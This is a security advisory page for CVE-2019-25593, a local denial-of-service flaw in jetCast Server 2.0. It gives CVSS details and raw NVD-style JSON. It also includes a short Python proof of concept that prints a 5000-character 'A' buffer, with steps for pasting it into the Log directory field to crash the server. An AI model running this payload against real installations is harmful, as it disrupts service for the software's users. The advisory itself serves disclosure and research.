Security Vulnerability Report
中文
CVE-2019-25593 CVSS 5.5 MEDIUM

CVE-2019-25593

Published: 2026-03-22 14:16:26
Last Modified: 2026-04-16 16:19:51
Source: [email protected]

Description

jetCast Server 2.0 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Log directory configuration field. Attackers can paste a buffer of 5000 characters into the Log directory input, then click Start to trigger a crash that terminates the server process.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

jetCast Server 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2019-25593 PoC Generator # This script generates the malicious payload used to crash jetCast Server 2.0. # Usage: Run the script, copy the output, and paste it into the 'Log directory' field in jetCast Server. def generate_payload(): # The vulnerability is triggered by a string of approximately 5000 characters buffer_size = 5000 payload = "A" * buffer_size return payload if __name__ == "__main__": try: exploit_code = generate_payload() print("[+] Payload generated successfully.") print(f"[+] Payload length: {len(exploit_code)} characters") print("\n--- PAYLOAD START ---") print(exploit_code) print("--- PAYLOAD END ---") print("\n[!] Instructions:") print("1. Copy the payload above.") print("2. Open jetCast Server 2.0.") print("3. Paste the payload into the 'Log directory' configuration field.") print("4. Click 'Start' to trigger the crash.") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25593", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:26.027", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "jetCast Server 2.0 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Log directory configuration field. Attackers can paste a buffer of 5000 characters into the Log directory input, then click Start to trigger a crash that terminates the server process."}, {"lang": "es", "value": "jetCast Servidor 2.0 contiene una vulnerabilidad de denegación de servicio que permite a los atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo de configuración del directorio de registro. Los atacantes pueden pegar un búfer de 5000 caracteres en la entrada del directorio de registro, luego hacer clic en Iniciar para desencadenar un bloqueo que termina el proceso del servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1285"}]}], "references": [{"url": "http://www.jetaudio.com/", "source": "[email protected]"}, {"url": "http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46819", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/jetcast-server-denial-of-service-via-log-directory", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.